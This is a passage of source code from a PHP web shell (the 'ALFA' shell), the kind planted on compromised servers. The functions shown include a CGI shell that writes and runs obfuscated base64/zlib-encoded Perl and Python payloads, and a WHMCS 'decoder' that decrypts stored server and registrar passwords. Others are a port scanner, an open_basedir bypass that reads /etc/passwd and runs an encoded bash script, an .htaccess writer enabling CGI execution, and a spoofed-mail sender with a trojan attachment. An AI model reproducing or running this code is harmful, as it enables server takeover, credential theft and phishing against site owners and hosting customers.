4955 $db["page"] = (int)$db["page"] - 1;
4956 $query = "SELECT * FROM `".$db["db"]."`.`".$db["table"]."` LIMIT ".($db["page"]*30).",30";
4957 }elseif($type == "search"){
4958 $search = "";
4959 $search_noval = array("= ''", "!= ''", "IS NULL", "IS NOT NULL");
4960 foreach($db["search"] as $col => $val){
4961 $search_noval_r = in_array($val["opt"], $search_noval);
4962 if(empty($val["value"]) && !$search_noval_r)continue;
4963 if(strstr($val["opt"], "...") || $search_noval_r){
4964 $val["opt"] = str_replace("...", $val["value"], $val["opt"]);
4965 $search .= $col . " " . $val["opt"] . " AND ";
4966 }else{
4967 $search .= $col . " " . $val["opt"] . " '".addslashes($val["value"])."' AND ";
4968 }
4969 }
4970 $search .= "1=1";
4971 $query = "SELECT * FROM `".$db["db"]."`.`".$db["table"]."` WHERE " . $search;
4972 }
4973 $q_tables = @mysqli_query($conn, $query);
4974 if(!$q_tables){
4975 echo @json_encode(array("status" => false, "error" => @mysqli_error($conn), "query" => $query));
4976 return false;
4977 }
4978 $col_key = @mysqli_query($conn, "SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA = '".@addslashes($db["db"])."' AND TABLE_NAME = '".@addslashes($db["table"])."' AND COLUMN_KEY = 'PRI'");
4979 if($col_key){
4980 $col_key = @mysqli_fetch_row($col_key);
4981 $col_key = $col_key[0];
4982 if(!empty($col_key)){
4983 $tbl_content = '<div style="margin-bottom:5px;margin-top:5px;"><button col_key="'.$col_key.'" tbl_name="'.$db["table"].'" db_id="'.$db["db_id"].'" db_target="'.$db["db"].'" onclick="alfaMysqlDeleteAllSelectedrows(this);return false;">Delete Selected Rows</button></div><table width="100%" cellspacing="1" cellpadding="2" class="main mysql-data-tbl" style="background-color:#292929">';
4984 }
4985 }else{
4986 $col_key = false;
4987 }
4988 while($item = @mysqli_fetch_assoc($q_tables)){
4989 if(!$title){
4990 $tbl_content .= '<tr style="background-color:#305b8e;">';
4991 if($col_key){
4992 $tbl_content .= '<th style="width: 55px;text-align:center;"><input db_id="'.$db["db_id"].'" onchange="alfaMysqlTblSelectAll(this);" type="checkbox"></th><th style="width: 55px;text-align:center;">Edit</th><th style="width: 55px;text-align:center;">Delete</th>';
4993 }
4994 foreach($item as $key => $value){
4995 $tbl_content .= '<th>'.$key.'</th>';
4996 }
4997 reset($item);
4998 $title=true;
4999 $tbl_content .= '</tr><tr>';
5000 }
5001
5002 if($col_key){
5003 $cacheMsg = '<td style="text-align:center;"><input row_id="'.$line.'" type="checkbox" name="tbl_rows_checkbox[]" value="'.$item[$col_key].'"></td><td style="text-align:center;"><a class="db-opt-id" href="javascript:void(0);" db_id="'.$db["db_id"].'" db_target="'.$db["db"].'" tbl_name="'.$db["table"].'" col_key="'.$col_key.'" key="'.$item[$col_key].'" onclick="alfaMysqlEditRow(this, \'edit\');" style="color:#0acaa6;">Edit</a></td><td style="text-align:center;"><a class="db-opt-id" href="javascript:void(0);" db_id="'.$db["db_id"].'" db_target="'.$db["db"].'" tbl_name="'.$db["table"].'" col_key="'.$col_key.'" key="'.$item[$col_key].'" row_id="'.$line.'" onclick="alfaMysqlEditRow(this, \'delete\');" style="color:#ff1e1e;">Delete</a></td>';
5004 }
5005 $tbl_content .= '<tr class="tbl_row tbl_row_l'.$line.'">'.$cacheMsg;
5006 $line++;
5007 foreach($item as $key => $value){
5008 if($value == null){
5009 $tbl_content .= '<td><i>null</i></td>';
5010 }else{
5011 $tbl_content .= '<td>'.nl2br(htmlspecialchars($value)).'</td>';
5012 }
5013 }
5014 $tbl_content .= '</tr>';
5015 }
5016 $tbl_content .= '</table>';
5017 if(!$title){
5018 $tbl_content = "<div style='padding:5px;border:1px dashed;margin:10px;'>Table is empty...</div>";
5019 }
5020 echo @json_encode(array("status" => true, "table" => $tbl_content, "columns" => $columns, "pages" => $pages, "query" => $query));
5021 }
5022 @mysqli_close($conn);
5023 }
5024}
5025function alfaselfrm(){
5026if(isset($_POST['alfa1'])&&$_POST['alfa1']=='yes'){
5027echo(__pre().'<center>');
5028if(@unlink($GLOBALS['__file_path'])){
5029echo('<b>Shell has been removed</i> :)</b>');
5030}else{
5031echo 'unlink error!';
5032}
5033echo('</center>');
5034}
5035if(isset($_POST['alfa1'])&&$_POST['alfa1']!='yes'){
5036echo "<div class=header>";
5037echo "
5038<center><p><img src=\"http://solevisible.com/images/farvahar-iran.png\"></p>";
5039echo '<p><div class="txtfont">Do you want to destroy me?!</div><a href=javascript:void(0) onclick="g(\'selfrm\',null,\'yes\');"> Yes</a>';
5040echo '</p></center></div>';
5041}
5042}
5043function alfacgishell(){
5044alfahead();
5045$div = "";
5046alfaCreateParentFolder();
5047@chdir($GLOBALS['home_cwd'] . "/" . __ALFA_DATA_FOLDER__);
5048if(!in_array($_POST['alfa1'],array('perl','py'))){
5049$div = "</div>";
5050echo '<div class=header><center><p><div class="txtfont_header">| CGI Shell |</div></p><h3><a href=javascript:void(0) onclick="runcgi(\'perl\')">| Perl | </a><a href=javascript:void(0) onclick="runcgi(\'py\');">| Python | </a>';
5051}
5052if(isset($_POST['alfa1'])&&in_array($_POST['alfa1'],array('perl','py'))){
5053@mkdir('cgialfa',0755);
5054@chdir('cgialfa');
5055alfacgihtaccess('cgi');
5056$name = $_POST['alfa1'].'.alfa';
5057$perl = '#!/usr/bin/perl -I/usr/local/bandmin'."\n".'use MIME::Base64;use Compress::Zlib;eval(Compress::Zlib::memGunzip(decode_base64("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")));';;
5058$py = '#!/usr/bin/python'."\nimport zlib, base64\n".'eval(compile(zlib.decompress(base64.b64decode("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")),\'<string>\',\'exec\'))';
5059if($_POST['alfa1']=='perl'){$code = $perl;}else{$code = $py;}
5060if(__write_file($name,$code)){
5061@chmod($name,0755);
5062echo '<iframe src="'.__ALFA_DATA_FOLDER__.'/cgialfa/'.$name.'" width="100%" height="600px" frameborder="0" style="opacity:0.9;filter: alpha(opacity=9);overflow:auto;"></iframe>';
5063}
5064}
5065echo $div;
5066alfafooter();
5067}
5068function alfaWhmcs(){
5069alfahead();
5070echo '<div class=header>';
5071function decrypt($string,$cc_encryption_hash){
5072$key = md5 (md5 ($cc_encryption_hash)) . md5 ($cc_encryption_hash);
5073$hash_key = _hash($key);
5074$hash_length = strlen ($hash_key);
5075$string = __ZGVjb2Rlcg($string);
5076$tmp_iv = substr ($string, 0, $hash_length);
5077$string = substr ($string, $hash_length, strlen ($string) - $hash_length);
5078$iv = $out = '';
5079$c = 0;
5080while ($c < $hash_length)
5081{
5082$iv .= chr (ord ($tmp_iv[$c]) ^ ord ($hash_key[$c]));
5083++$c;
5084}
5085$key = $iv;
5086$c = 0;
5087while ($c < strlen ($string))
5088{
5089if (($c != 0 AND $c % $hash_length == 0))
5090{
5091$key = _hash ($key . substr ($out, $c - $hash_length, $hash_length));
5092}
5093$out .= chr (ord ($key[$c % $hash_length]) ^ ord ($string[$c]));
5094++$c;
5095}
5096return $out;
5097}
5098function _hash($string)
5099{
5100if(function_exists('sha1'))
5101{
5102$hash = sha1 ($string);
5103}
5104else
5105{
5106$hash = md5 ($string);
5107}
5108$out = '';
5109$c = 0;
5110while ($c < strlen ($hash))
5111{
5112$out .= chr (hexdec ($hash[$c] . $hash[$c + 1]));
5113$c += 2;
5114}
5115return $out;
5116}
5117AlfaNum(8,9,10);
5118echo "<center><br><div class='txtfont_header'>| WHMCS DeCoder |</div><p>".getConfigHtml('whmcs')."</p><form onsubmit=\"g('Whmcs',null,this.form_action.value,'decoder',this.db_username.value,this.db_password.value,this.db_name.value,this.cc_encryption_hash.value,this.db_host.value); return false;\">
5119<input type='hidden' name='form_action' value='2'>";
5120$table = array('td1' =>
5121 array('color' => 'FFFFFF', 'tdName' => 'db_host : ', 'inputName' => 'db_host', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'),
5122 'td2' =>
5123 array('color' => 'FFFFFF', 'tdName' => 'db_username : ', 'inputName' => 'db_username', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'),
5124 'td3' =>
5125 array('color' => 'FFFFFF', 'tdName' => 'db_password : ', 'inputName' => 'db_password', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50'),
5126 'td4' =>
5127 array('color' => 'FFFFFF', 'tdName' => 'db_name : ', 'inputName' => 'db_name', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'),
5128 'td5' =>
5129 array('color' => 'FFFFFF', 'tdName' => 'cc_encryption_hash : ', 'inputName' => 'cc_encryption_hash', 'id' => 'cc_encryption_hash', 'inputValue' => '', 'inputSize' => '50')
5130);
5131create_table($table);
5132echo "<p><input type='submit' value=' ' name='Submit'></p></form></center>";
5133if($_POST['alfa5']!=''){
5134$db_host=($_POST['alfa7']);
5135$db_username=($_POST['alfa3']);
5136$db_password=($_POST['alfa4']);
5137$db_name=($_POST['alfa5']);
5138$cc_encryption_hash=($_POST['alfa6']);
5139echo __pre();
5140$conn=@mysqli_connect($db_host,$db_username,$db_password,$db_name) or die(mysqli_error($conn));
5141$query = mysqli_query($conn,"SELECT * FROM tblservers");
5142$num = mysqli_num_rows($query);
5143if ($num > 0){
5144for($i=0; $i <=$num-1; $i++){
5145$v = @mysqli_fetch_array($query);
5146$ipaddress = $v['ipaddress'];
5147$username = $v['username'];
5148$type = $v['type'];
5149$active = $v['active'];
5150$hostname = $v['hostname'];
5151echo("<center><table border='1'>");
5152$password = decrypt ($v['password'], $cc_encryption_hash);
5153echo("<tr><td><b><font color=\"#FFFFFF\">Type</font></td><td>$type</td></tr></b>");
5154echo("<tr><td><b><font color=\"#FFFFFF\">Active</font></td><td>$active</td></tr></b>");
5155echo("<tr><td><b><font color=\"#FFFFFF\">Hostname</font></td><td>$hostname</td></tr></b>");
5156echo("<tr><td><b><font color=\"#FFFFFF\">Ip</font></td><td>$ipaddress</td></tr></b>");
5157echo("<tr><td><b><font color=\"#FFFFFF\">Username</font></td><td>$username</td></tr></b>");
5158echo("<tr><td><b><font color=\"#FFFFFF\">Password</font></td><td>$password</td></tr></b>");
5159echo "</table><br><br></center>";
5160}
5161$query1 = @mysqli_query($conn,"SELECT * FROM tblregistrars");
5162$num1 = @mysqli_num_rows($query1);
5163if ($num1 > 0){
5164for($i=0; $i <=$num1 -1; $i++){
5165$v = mysqli_fetch_array($query1);
5166$registrar = $v['registrar'];
5167$setting = $v['setting'];
5168$value = decrypt($v['value'], $cc_encryption_hash);
5169if ($value==""){
5170$value=0;
5171}
5172echo("<center>Domain Reseller <br><center>");
5173echo("<center><table border='1'>");
5174echo("<tr><td><b><font color=\"#67ABDF\">Register</font></td><td>$registrar</td></tr></b>");
5175echo("<tr><td><b><font color=\"#67ABDF\">Setting</font></td><td>$setting</td></tr></b>");
5176echo("<tr><td><b><font color=\"#67ABDF\">Value</font></td><td>$value</td></tr></b>");
5177echo "</table><br><br></center>";
5178}
5179}
5180}else{__alert('<font color="red">tblservers is Empty...!</font>');};
5181}
5182echo "</div>";
5183alfafooter();
5184}
5185function alfaportscanner(){
5186alfahead();
5187echo '<div class=header><center><p><div class="txtfont_header">| Port Scaner |</div></p>
5188<form action="" method="post" onsubmit="g(\'portscanner\',null,null,this.start.value,this.end.value,this.host.value); return false;">
5189<input type="hidden" name="y" value="phptools">
5190<div class="txtfont">Host: </div> <input id="text" type="text" name="host" value="localhost"/>
5191<div class="txtfont">Port start: </div> <input id="text" size="5" type="text" name="start" value="80"/>
5192<div class="txtfont">Port end: </div> <input id="text" size="5" type="text" name="end" value="80"/> <input type="submit" value=" " />
5193</form></center><br>';
5194$start = strip_tags($_POST['alfa2']);
5195$end = strip_tags($_POST['alfa3']);
5196$host = strip_tags($_POST['alfa4']);
5197if(isset($_POST['alfa4']) && is_numeric($_POST['alfa3']) && is_numeric($_POST['alfa2'])){
5198echo __pre();
5199$packetContent = "GET / HTTP/1.1\r\n\r\n";
5200if(ctype_xdigit($packetContent))$packetContent = @pack("H*" , $packetContent);
5201else{
5202$packetContent = str_replace(array("\r","\n"), "", $packetContent);
5203$packetContent = str_replace(array("\\r","\\n"), array("\r", "\n"), $packetContent);
5204}
5205for($i = $start; $i<=$end; $i++){
5206$sock = @fsockopen($host, $i, $errno, $errstr, 3);
5207if($sock){
5208stream_set_timeout($sock, 5);
5209fwrite($sock, $packetContent."\r\n\r\n\x00");
5210$counter = 0;
5211$maxtry = 1;
5212$bin = "";
5213do{
5214$line = fgets($sock, 1024);
5215if(trim($line)=="")$counter++;
5216$bin .= $line;
5217}while($counter<$maxtry);
5218fclose($sock);
5219echo "<center><p>Port <font style='color:#DE3E3E'>$i</font> is open</p>";
5220echo "<p><textarea style='height:140px;width:50%;'>".$bin."</textarea></p></center>";
5221}
5222flush();
5223}
5224}
5225echo '</div>';
5226alfafooter();
5227}
5228function alfacgihtaccess($m,$d='', $symname=false){
5229$readme = "";
5230if($symname){$readme="\nReadmeName ".trim($symname);}
5231if($m=='cgi'){
5232$code = "#Coded By Sole Sad & Invisible\nOptions FollowSymLinks MultiViews Indexes ExecCGI\nAddType application/x-httpd-cgi .alfa\nAddHandler cgi-script .alfa";
5233}elseif($m=='sym'){
5234$code = "#Coded By Sole Sad & Invisible\nOptions Indexes FollowSymLinks\nDirectoryIndex solevisible.phtm\nAddType text/plain php html php4 phtml\nAddHandler text/plain php html php4 phtml{$readme}\nOptions all";
5235}elseif($m=='shtml'){
5236$code = "Options +Includes\nAddType text/html .shtml\nAddHandler server-parsed .shtml";
5237}
5238@__write_file($d . ".htaccess", $code);
5239}
5240function alfabasedir(){
5241alfahead();
5242echo '<div class=header>
5243<center><p><div class="txtfont_header">| Open Base Dir |</div></p></center>';
5244$passwd = _alfa_file('/etc/passwd');
5245if(is_array($passwd)){
5246$users = array();
5247$makepwd = alfaMakePwd();
5248$basedir = @ini_get('open_basedir');
5249$safe_mode = @ini_get('safe_mode');
5250if(_alfa_can_runCommand(true,false)&&($basedir||$safe_mode)){
5251$bash = "fZBPSwMxEMXPzacYx9jugkvY9lbpTQ9eFU9NWdYk2wYkWZKsgmu+u9NaS8E/cwgDL/N+M+/yQjxbJ+KO3d4/rHjNusGpZL2DmEITTP/SKlOUIwOqNVTvgLxG2MB0CsGkITioz7X5P9riN60hzhHTvLYn5IoXfbAudYBXUUqHX9wPiEZDZQCj4OM807PIYovlwevHxPiHe0aWmVE7f7BaS4Ws8wEsWAe8UEOCSi+h6moQJinRtzG+6fIGtGeTp8c7Cqo4i4dAFB7xxiGakPdgSxtN6OxA/X7gePk3UtIPiddMe2dOe8wQN7NP";
5252$tmp_path = alfaWriteTocgiapi("basedir.alfa",$bash);
5253$bash_users = alfaEx("cd ".$tmp_path."/alfacgiapi;sh basedir.alfa ".$makepwd,false,true,true);
5254$users = json_decode($bash_users, true);
5255$x=count($users);
5256if($x>=2){array_pop($users);--$x;}
5257}
5258if(!$basedir&&!$safe_mode){
5259$x=0;
5260foreach($passwd as $str){
5261$pos = strpos($str,':');
5262$username = substr($str,0,$pos);
5263$dirz = str_replace("{user}", $username, $makepwd);
5264if(($username != '')){
5265if (@is_readable($dirz)){
5266array_push($users,$username);
5267$x++;
5268}}}
5269}
5270echo '<br><br>';
5271echo "<b><font color=\"#00A220\">[+] Founded ".sizeof($passwd)." entrys in /etc/passwd\n"."<br /></font></b>";
5272echo "<b><font color=\"#FFFFFF\">[+] Founded ".$x." readable ".str_replace("{user}", "*", $makepwd)." directories\n"."<br /></font></b>";
5273echo "<b><font color=\"#FF0000\">[~] Searching for passwords in config files...\n\n"."<br /><br /><br /></font></b>";
5274foreach($users as $user){
5275if(empty($user))continue;
5276$path = str_replace("{user}", $user, $makepwd);
5277echo "<form method=post onsubmit='g(\"FilesMan\",this.c.value,\"\");return false;'><span><font color=#27979B>Change Dir <font color=#FFFF01>..:: </font><font color=red><b>$user</b></font><font color=#FFFF01> ::..</font></font></span><br><input class='foottable' type=text name=c value='$path'><input type=submit value='>>'></form><br>";
5278}
5279}else{echo('<b> <center><font color="#FFFFFF">[-] Error : coudn`t read /etc/passwd [-]</font></center></b>');}
5280echo '<br><br></b>';
5281echo '</div>';
5282alfafooter();
5283}
5284function alfamail(){
5285alfahead();
5286echo '<div class=header>';
5287AlfaNum(8,9,10);
5288echo '<center><p><div class="txtfont_header">| Fake Mail |</div></p><form action="" method="post" onsubmit="g(\'mail\',null,this.mail_to.value,this.mail_from.value,this.mail_subject.value,\'>>\',this.mail_content.value,this.count_mail.value,this.mail_attach.value); return false;">';
5289$table = array(
5290'td1' => array('color' => 'FFFFFF', 'tdName' => 'Mail To : ', 'inputName' => 'mail_to', 'inputValue' => 'target@fbi.gov', 'inputSize' => '60','placeholder' => true),
5291'td2' => array('color' => 'FFFFFF', 'tdName' => 'From : ', 'inputName' => 'mail_from', 'inputValue' => 'sec@google.com', 'inputSize' => '60', 'placeholder' => true),
5292'td3' => array('color' => 'FFFFFF', 'tdName' => 'Subject : ', 'inputName' => 'mail_subject', 'inputValue' => 'your site hacked by me', 'inputSize' => '60'),
5293'td4' => array('color' => 'FFFFFF', 'tdName' => 'Attach File : ', 'inputName' => 'mail_attach', 'inputValue' => $GLOBALS['cwd'].'trojan.exe', 'inputSize' => '60'),
5294'td5' => array('color' => 'FFFFFF', 'tdName' => 'Count Mail : ', 'inputName' => 'count_mail', 'inputValue' => '1', 'inputSize' => '60')
5295);
5296create_table($table);
5297echo '<p><div class="txtfont">Message:</div></p><textarea rows="6" cols="60" name="mail_content">Hi Dear Admin :)</textarea><p><input type="submit" value=" " name="mail_send" /></p></form></center>';
5298if(isset($_POST['alfa4'])&&($_POST['alfa4'] == '>>')){
